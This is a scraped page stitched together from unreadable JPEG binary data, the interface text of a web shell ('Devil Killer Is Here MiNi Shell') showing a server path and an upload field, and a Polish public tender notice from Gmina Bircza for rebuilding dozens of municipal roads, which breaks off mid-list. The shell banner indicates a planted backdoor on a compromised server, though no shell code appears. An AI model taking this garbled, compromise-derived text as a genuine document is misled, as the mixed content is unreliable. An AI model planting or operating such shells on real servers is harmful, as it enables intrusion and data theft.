JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240329/0026620701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dróg gminnych i wewnętrznych na terenie Gminy Bircza” w ramach dofinasowania inwestycji z programu Rządowy Funduszu Polski Ład: Program Inwestycji Strategicznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Bircza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900476</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ojca Św. Jana Pawła II 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bircza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-740</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">166726090</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@bircza.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.bircza.pl/asp/start,0</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dróg gminnych i wewnętrznych na terenie Gminy Bircza” w ramach dofinasowania inwestycji z programu Rządowy Funduszu Polski Ład: Program Inwestycji Strategicznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7a887d20-edb6-11ee-9d6d-ce35ff56444c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00266207</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00217578/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 „Przebudowa dróg gminnych i wewnętrznych na terenie Gminy Bircza” w ramach dofinasowania inwestycji z programu Rządowy Funduszu Polski Ład: Program Inwestycji Strategicznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/bircza <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/bircza</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">20.1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>zamawiającym<br/>a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu środków komunikacji elektronicznej<br/>za pośrednictwem Platformy dostępnej na stronie profilu nabywcy https://platformazakupowa.pl/pn/bircza . Przez środki komunikacji<br/>elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług<br/>drogą elektroniczną (Dz. U. z 2020 r., poz. 344).<br/>a) w zakresie pytań technicznych związanych z działaniem systemu prosi się o kontakt z Centrum Wsparcia Klienta<br/>platformazakupowa.pl pod numer (22)1010202, cwk@platformazakupowa.pl,<br/>20.2.Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem https://platformazakupowa.pl/pn/bircza<br/>Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana za pośrednictwem https://platformazakupowa.pl/pn/bircza do konkretnego wykonawcy.<br/>20.3. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów<br/>i wiadomości bezpośrednio na https://platformazakupowa.pl/pn/bircza przesłanych przez zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>20.4. Zawiadomienia, oświadczenia, wnioski lub informacje składane są przez Wykonawcę<br/>za pośrednictwem Formularza do komunikacji jako załączniki poprzez Platformę, dostępną pod adresem<br/>https://platformazakupowa.pl/pn/bircza .<br/>20.5. Za datę przekazania oświadczeń, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich doręczenia za pośrednictwem formularza zamieszczonego<br/>na stronie https://platformazakupowa.pl/pn/bircza, w zakładce dedykowanej postępowaniu.<br/>20.6. Zamawiający informuje, że posiadanie konta na Platformie jest dobrowolne, a złożenie oferty<br/>w przetargu jest możliwe bez posiadania konta.<br/>20.7. Na stronie Platformy znajduje się Instrukcja dla Wykonawców zawierająca: informacje ogólne, informacje dot. sposobu i formy<br/>złożenia oferty oraz sposobu komunikowania się Zamawiającego<br/>z Wykonawcami (nie dotyczy składania ofert),<br/>20.7.1. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące<br/>w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w<br/>niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie<br/>internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.\ CD. w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">30.1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>30.2.	1/ Administratorem danych osobowych przekazywanych przez Wykonawcę lub inne podmioty w ramach niniejszego postępowania jest Wójt Gminy Bircza, 37-740 Bircza, ul. Ojca Św. Jana Pawła II 2,<br/>2/ Inspektorem ochrony danych osobowych w Urzędzie Gminy Bircza jest Adam Ziemiński, email adam.zieminski@cbi24.pl<br/>30.2.1.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 <br/>lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: 12.1.	Przedmiotem niniejszego zamówienia jest: „Przebudowa dróg gminnych i wewnętrznych na terenie Gminy Bircza” w ramach dofinasowania inwestycji z programu Rządowy Funduszu Polski Ład: Program Inwestycji Strategicznych, prowadzonym w trybie podstawowym bez negocjacji.<br/>30.2.2.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu ustawę Pzp, <br/>30.2.3.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania <br/>o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego,<br/>30.2.4.	Niezależnie od postanowień ppkt 30.1.5. powyżej, w przypadku zawarcia umowy <br/>w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego,<br/>30.2.5.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/>30.2.6.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>30.2.7.	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>30.2.8.	Nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>30.2.9.	Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym <br/>lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe <br/>są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest: „Przebudowa dróg gminnych <br/>i wewnętrznych na terenie Gminy Bircza” w ramach dofinasowania inwestycji z programu Rządowy Funduszu Polski Ład: Program Inwestycji Strategicznych w zakresie podstawowym oraz w zakresie opcjonalnym.<br/><br/>Zakres podstawowy<br/>Lp.	Nazwa zadania	Długość drogi w mb<br/>1	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 67,70 w miejscowości Roztoka	200,00<br/>2	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 10 w miejscowości Roztoka	90,00<br/>3	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 22 w miejscowości Roztoka	270,00<br/>4	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 570/1 w miejscowości Kuźmina	110,00<br/>5	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 1211/2 w miejscowości Kuźmina	74,00<br/>6	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 1148/1 w miejscowości Kuźmina	80,00<br/>7	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 375 w miejscowości Kuźmina	110,00<br/>8	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 490/1 w miejscowości Kuźmina	120,00<br/>9	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 1091 w miejscowości Kuźmina	110,00<br/>10	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 815 w miejscowości Kuźmina	160,00<br/>11	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 774 w miejscowości Kuźmina	90,00<br/>12	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 160 w miejscowości Kuźmina	100,00<br/>13	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 10 w miejscowości Kuźmina	110,00<br/>14	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 235 w miejscowości Kuźmina	50,00<br/>15	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 75, 185/1, 192/1, w miejscowości Nowa Wieś	220,00<br/>16	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 148/1, 127/1, 111/1, w miejscowości Nowa Wieś	360,00<br/>17	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 152, 145 w miejscowości Nowa Wieś	200,00<br/>18	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 135, w miejscowości Nowa Wieś	67,00<br/>19	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 126 w miejscowości Nowa Wieś	300,00<br/>20	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 327/1, 333/1, 333/3, 335, w miejscowości Sufczyna	489,00<br/>21	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 142, w miejscowości Sufczyna	147,00<br/>22	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 277, w miejscowości Sufczyna	50,00<br/>23	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 248, w miejscowości Sufczyna	500,00<br/>24	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 267, w miejscowości Jasienica Sufczyńska	270,00<br/>25	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 205, 228/2, 204, w miejscowości Jasienica Sufczyńska	240,00<br/>26	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 151, w miejscowości Jasienica Sufczyńska	60,00<br/>27	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 330, w miejscowości Jasienica Sufczyńska	43,00<br/>28	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 55, 57, 56 , 67 w miejscowości Jasienica Sufczyńska	600,00<br/>29	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 187, 177 , w miejscowości Jasienica Sufczyńska	100,00<br/>30	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 164, w miejscowości Brzuska	100,00<br/>31	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 140, w miejscowości Brzuska	180,00<br/>32	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 98, 102 w miejscowości Brzuska	280,00<br/>33	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 229, w miejscowości Brzuska	182,00<br/>34	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 60, w miejscowości Brzuska	200,00<br/>35	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 24, 28, w miejscowości Brzuska	60,00<br/>36	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 287, w miejscowości Brzuska	75,00<br/>37	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 298, w miejscowości Brzuska	30,00<br/>38	Przebudowa drogi gminnej Nr 116010 w miejscowości Bircza	688,00<br/>39	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 145, 125, w miejscowości Bircza	500,00<br/>40	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 741, w miejscowości Bircza	175,00<br/>41	Przebudowa drogi gminnej Nr 116012 w miejscowości Bircza	300,00<br/>42	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 688, w miejscowości Bircza	145,00<br/>43	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 531, w km 0+000 do km 0+120 oraz od km 0+650 do km 0+830miejscowości Bircza	250,00<br/>44	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 49 w miejscowości Wola Korzeniecka	280,00<br/>45	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 197/3, 197/1 w miejscowości Wola Korzeniecka	150,00<br/>46	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 512 w miejscowości Korzeniec	300,00<br/>47	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 398 w miejscowości Korzeniec	155,00<br/>48	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 198 w miejscowości Korzeniec	50,00<br/>49	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 233 w miejscowości Korzeniec	300,00<br/>50	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 786 w miejscowości Korzeniec	80,00<br/>51	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 682 w miejscowości Korzeniec	265,00<br/>52	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 230/3 w miejscowości Huta Brzuska	200,00<br/>53	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 392, 386 w miejscowości Huta Brzuska	465,00<br/>54	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 173 w miejscowości Huta Brzuska	85,00<br/>55	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 112 w miejscowości Borownica	208,00<br/>56	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 167 w miejscowości Borownica	290,00<br/>57	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 294 w miejscowości Jawornik Ruski	30,00<br/>58	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 280 w miejscowości Jawornik Ruski	160,00<br/>59	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 183 w miejscowości Żohatyn	120,00<br/>60	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 204 w miejscowości Lipa	150,00<br/>61	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 232 w miejscowości Lipa	75,00<br/>62	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 330 w miejscowości Leszczawka 118,00<br/>63	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 616 w miejscowości Leszczawa Dolna	70,00<br/>64	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 685 w miejscowości Leszczawa Dolna	65,00<br/>65	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 328 w miejscowości Rudawka	100,00<br/>66	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 149 w miejscowości Rudawka	105,00<br/>67	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 26 w miejscowości Łodzinka Górna	620,00<br/><br/>Zakres opcjonalny<br/>Lp.	Nazwa zadania	Długość drogi w mb<br/>1	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 284, w miejscowości Sufczyna	160,00<br/>2	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 398 w miejscowości Nowa Wieś	640,00<br/>3	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 47 w miejscowości Nowa Wieś	152,00<br/>4	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 1194 w miejscowości Kuźmina	120,00<br/>5	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 365 w miejscowości Kuźmina	50,00<br/>6	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 262, w miejscowości Jasienica Sufczyńska	300,00<br/>7	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 60 w miejscowości Korzeniec	20,00<br/>8	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 478, 481 w miejscowości Huta Brzuska	900,00<br/>9	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 88 w miejscowości Borownica	800,00<br/>10	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 182 w miejscowości Borownica	450,00<br/>11	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 179 w miejscowości Borownica	230,00<br/>12	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 101/3, 169 w miejscowości Wola Korzeniecka	270,00<br/>13	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 372, 341 w miejscowości Jawornik Ruski	700,00<br/>14	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 76, w miejscowości Sufczyna	235,00<br/>15	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 78 w miejscowości Żohatyn	120,00<br/>16	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 509 w miejscowości Korzeniec	190,00<br/>17	Przebudowa drogi gminnej wewnętrznej dz. ewid. nr 274, 268/3, 241/2, 268/4 w miejscowości Jawornik Ruski	780,00<br/><br/>12.2.	Szczegółowy zakres zamówienia został określony w załączniku nr 8 do SWZ <br/>Pozostałe warunki dotyczące realizacji zamówienia określone zostały w projektowanych postanowieniach umowy - załącznik nr 7 do SWZ.<br/>12.3.	Wymagania (obowiązki) stawiane Wykonawcy, opisane zostały w projektowanych postanowieniach umowy stanowiących - załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p 